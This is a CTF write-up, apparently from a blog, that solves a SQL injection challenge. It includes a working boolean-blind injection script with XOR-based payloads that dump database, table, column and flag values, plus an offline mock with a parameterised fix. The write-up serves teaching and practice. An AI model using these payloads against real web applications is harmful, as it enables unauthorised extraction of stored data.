[极客大挑战 2019]FinalSQL
2022-08-05 03:52:00 【pakho_C】
Click through the five pages in turn.
The last page hints at trying a sixth one. The URL carries an id parameter; entering 6 gives:
There is a parameter, so try a single quote.
The response says error, so there should be SQL injection; try a tautology (an always-true condition).
There is certainly filtering in place; fuzz it:
Quite a few keywords are filtered, but the XOR operator ^ is not, and there is no page that echoes SQL errors, so this has to be blind injection.
Use the XOR property (equal operands give 0, different operands give 1) to test:
id=0^1 evaluates to 1 and returns NO! Not this! Click others~~~ (the page for id=1); id=1^1 evaluates to 0 and returns ERROR!!! (there is no row with id 0). These two responses are the true/false oracle for the blind injection: 0^(condition) is 1 when the condition holds and 0 when it does not.
Write a brute-force script; it is based on this author's: [极客大挑战 2019]FinalSQL
In the core statements below, i is the character position and mid the midpoint of the binary search; the "+str(i)+" and "+str(mid)+" pieces are the script's string concatenation.
1. Brute-force the database name. Core statement:
0^(ascii(substr((select(database())),"+str(i)+",1))>"+str(mid)+")
The database name is geek.
2. Brute-force the table names. Core statement:
0^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),"+str(i)+",1))>"+str(mid)+")
The tables are F1naI1y and Flaaaaag.
3. Brute-force the column names. Core statement:
0^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),"+str(i)+",1))>"+str(mid)+")
The columns of F1naI1y are id, username, password.
0^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='Flaaaaag')),"+str(i)+",1))>"+str(mid)+")
The columns of Flaaaaag are id, fl4gawsl.
Guess that the flag is in fl4gawsl.
4. Brute-force the flag. Core statement:
0^(ascii(substr((select(group_concat(fl4gawsl))from(Flaaaaag)),"+str(i)+",1))>"+str(mid)+")
The flag is not there; query the password column of the other table instead, i.e. select(group_concat(password))from(F1naI1y).
Found the flag.
Full script:
import requests

target = "http://f394d9ca-2bcb-4014-bf77-82cd9e2a9963.node4.buuoj.cn:81/search.php"

# All four functions run the same boolean-blind bisection. For character i of the target
# string the payload asks whether ascii(char) > mid: 0^1 = 1 selects the id=1 row and the
# page contains "others" (true); 0^0 = 0 selects nothing and the page is ERROR (false).
# Spaces are filtered, so every sub-expression is wrapped in parentheses instead.

def getDataBase():  # get the database name
    database_name = ""
    for i in range(1, 1000):  # start at 1: substr() counts from the first character
        low = 32
        high = 127
        mid = (low + high) // 2
        while low < high:  # binary search over the printable ASCII range
            params = {
                # select(database()) has to be wrapped in () because spaces are filtered
                "id": "0^(ascii(substr((select(database())),"+str(i)+",1))>"+str(mid)+")"
            }
            r = requests.get(url=target, params=params)
            if "others" in r.text:  # true: the character is in the upper half
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        # Past the end of the string substr() returns '' and ascii('') is 0, so every
        # comparison is false and the search collapses to 32: stop. (A real space, also
        # 32, would stop the loop too; none of the data here contains one.)
        if low <= 32 or high >= 127:
            break
        database_name += chr(mid)  # convert the ASCII code back to a character
    print("database name: " + database_name)

def getTable():  # get the table names
    table_name = ""
    for i in range(1, 1000):
        low = 32
        high = 127
        mid = (low + high) // 2
        while low < high:
            params = {
                "id": "0^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),"+str(i)+",1))>"+str(mid)+")"
            }
            r = requests.get(url=target, params=params)
            if "others" in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if low <= 32 or high >= 127:  # end of the string (see getDataBase)
            break
        table_name += chr(mid)
    print("table names: " + table_name)

def getColumn():  # get the column names of Flaaaaag (swap the table_name for F1naI1y)
    column_name = ""
    for i in range(1, 250):
        low = 32
        high = 127
        mid = (low + high) // 2
        while low < high:
            params = {
                "id": "0^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='Flaaaaag')),"+str(i)+",1))>"+str(mid)+")"
            }
            r = requests.get(url=target, params=params)
            if "others" in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if low <= 32 or high >= 127:  # end of the string
            break
        column_name += chr(mid)
    print("column names: " + column_name)

def getFlag():  # get the flag: it is in F1naI1y.password, not in Flaaaaag.fl4gawsl
    flag = ""
    for i in range(1, 1000):
        low = 32
        high = 127
        mid = (low + high) // 2
        while low < high:
            params = {
                "id": "0^(ascii(substr((select(group_concat(password))from(F1naI1y)),"+str(i)+",1))>"+str(mid)+")"
            }
            r = requests.get(url=target, params=params)
            if "others" in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if low <= 32 or high >= 127:  # end of the string
            break
        flag += chr(mid)
    print("flag: " + flag)

getDataBase()
getTable()
getColumn()
getFlag()
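As an added worked example (not code from the post or from the challenge), here is the extraction loop above reduced to one reusable bisection routine and run offline against a SQLite stand-in for search.php. The table and column names follow the post; the stored flag value, the blacklist (spaces and comment markers) and both request handlers are constructed for the example. SQLite has no ^ operator, so the mock's 0/1 switch is 0+(cond) instead of the post's 0^(cond); MySQL's ascii() is emulated with create_function so that ascii('') is 0, which is what the end of the string looks like through the oracle. Two things the post's script does not show: the search covers 0..127, so a space is recovered and the end of the string is detected by ascii('') == 0 rather than by the low <= 32 hack, and the parameterised handler beside the vulnerable one shows the same payloads extracting nothing.

```python
import sqlite3
from typing import Callable, Tuple

# ---- Offline stand-in for the challenge's search.php (constructed for this example) ----
OTHERS = "NO! Not this! Click others~~~"   # page served when the injected id matches the id=1 row
ERROR = "ERROR!!!"                         # page served when no row matches (id=0)
BLOCKED = "filtered"                       # assumed filter page; the real blacklist is not listed
FAKE_FLAG = "flag{made_up_for_this_example}"


def build_mock_db() -> sqlite3.Connection:
    """In-memory database with the post's table/column names and made-up contents."""
    con = sqlite3.connect(":memory:")
    # MySQL's ascii('') is 0; SQLite has no ascii(), so register one with that behaviour.
    con.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    con.executescript(f"""
        CREATE TABLE F1naI1y(id INTEGER, username TEXT, password TEXT);
        INSERT INTO F1naI1y VALUES (1, 'admin', '{FAKE_FLAG}');
        CREATE TABLE Flaaaaag(id INTEGER, fl4gawsl TEXT);
        INSERT INTO Flaaaaag VALUES (1, 'nothing here');
    """)
    return con


def vulnerable_search(con: sqlite3.Connection, user_id: str) -> str:
    """The bug: 'id' is concatenated into the query; only a keyword blacklist guards it."""
    if any(bad in user_id for bad in (" ", "--", "#", "/*")):   # assumed blacklist
        return BLOCKED
    rows = con.execute("SELECT username FROM F1naI1y WHERE id=" + user_id).fetchall()
    return OTHERS if rows else ERROR


def fixed_search(con: sqlite3.Connection, user_id: str) -> str:
    """The fix: validate the type and bind the value; the payloads never reach SQL."""
    try:
        page = int(user_id)
    except ValueError:
        return ERROR
    rows = con.execute("SELECT username FROM F1naI1y WHERE id=?", (page,)).fetchall()
    return OTHERS if rows else ERROR


# The post's MySQL payload: 0^(cond) is 1 when cond holds, so the id=1 page comes back.
MYSQL_TEMPLATE = "0^(ascii(substr(({expr}),{pos},1))>{mid})"
# SQLite has no ^ operator; 0+(cond) is the same 0/1 switch and is what the mock runs.
SQLITE_TEMPLATE = "0+(ascii(substr(({expr}),{pos},1))>{mid})"


def blind_extract(oracle: Callable[[str], bool], expr: str,
                  template: str = MYSQL_TEMPLATE, max_len: int = 256) -> Tuple[str, int]:
    """Recover the string produced by `expr` one character at a time by bisecting its
    ASCII value. oracle(payload) returns True when the injected condition held.
    Searching 0..127 instead of 32..127 means ascii('') == 0 marks the end of the
    string cleanly and a real space (32) is recovered instead of ending the loop.
    Returns (recovered_string, number_of_requests)."""
    out, sent = "", 0
    for pos in range(1, max_len + 1):
        low, high = 0, 127
        while low < high:               # invariant: ascii(char) is within [low, high]
            mid = (low + high) // 2
            sent += 1
            if oracle(template.format(expr=expr, pos=pos, mid=mid)):
                low = mid + 1           # char > mid
            else:
                high = mid              # char <= mid
        if low == 0:                    # substr() past the end: ascii('') == 0
            break
        out += chr(low)
    return out, sent


def run_demo(search) -> Tuple[str, int]:
    """Drive the extractor against one of the two handlers above."""
    con = build_mock_db()
    oracle = lambda payload: OTHERS in search(con, payload)
    return blind_extract(oracle, "select(group_concat(password))from(F1naI1y)", SQLITE_TEMPLATE)


if __name__ == "__main__":
    flag, n = run_demo(vulnerable_search)
    print(f"vulnerable handler: {flag!r} after {n} requests, {n // (len(flag) + 1)} per character")
    flag, n = run_demo(fixed_search)
    print(f"parameterised handler: {flag!r} after {n} requests")
```

Each character costs exactly seven requests because 0..127 halves cleanly, and the end-of-string probe costs seven more; against the parameterised handler the very first character already reads as 0 and the loop stops after those seven requests with nothing recovered.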